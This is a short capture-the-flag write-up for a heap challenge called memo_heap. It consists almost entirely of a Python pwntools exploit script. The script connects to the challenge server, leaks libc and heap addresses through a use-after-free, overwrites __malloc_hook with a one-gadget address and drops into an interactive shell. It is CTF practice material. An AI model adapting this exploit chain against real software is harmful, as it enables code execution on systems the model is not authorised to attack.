Tags: pwn 

Rating: 0

realloc size 0 -> uaf -> heap ptr modify

from pwn import *

#p=process(['./memo_heap'],env={'LD_PRELOAD':'./memoheap_libc.so.6'})
p=remote('memoheap.acebear.site',3003)

def create(size,name):
p.sendlineafter('choice: ','1')
p.sendlineafter('? ',str(size))
p.sendlineafter(': ',name)

def edit(idx,name):
p.sendlineafter('choice: ','2')
p.sendlineafter(': ',str(idx))
p.sendlineafter(': ',name)

def show(idx):
p.sendlineafter('choice: ','3')
p.sendlineafter(': ',str(idx))

def delete(idx):
p.sendlineafter('choice: ','4')
p.sendlineafter(': ',str(idx))

p.recvuntil('Menu')
create(0x100,'AAAA')
create(0x100,'BBBB')
delete(0)
create(8,'A'*8)
show(0)
sleep(1)
p.recvuntil('A'*8)
main_arena = u64(p.recv(6)+'\x00\x00')
libc_base = main_arena - 0x3c4c78
malloc_hook = libc_base + 0x3c4b10
one_shot = libc_base + 0xf1117
print hex(main_arena)
print hex(libc_base)
print hex(malloc_hook)
sleep(1)
create(8,'C'*8)
delete(2)
delete(0)create(1,'Z') #0
show(0)
p.recvuntil('Name: Z')
heap = u64('\x00'+p.recv(5)+'\x00\x00')
print hex(heap)
delete(0)
sleep(1)
delete(1)
create(0x5f,'A'*8) #0

create(0,'') #1
edit(1,'')
create(8,'C'*8) #2
delete(1)

create(16,p64(heap+0x10)+p32(0x5f)+p32(0x1)) #0 == 2
create(0x5f,'D'*8) #3
delete(2) #0 3 0 == 2 3 0
delete(3)
delete(0)
print '=='
create(0x5f,p64(malloc_hook-0x23))
create(0x5f,'D'*8)
create(0x5f,'A'*8)
create(0x5f,'E'*0x13+p64(one_shot))

p.sendlineafter(': ','1')

p.interactive()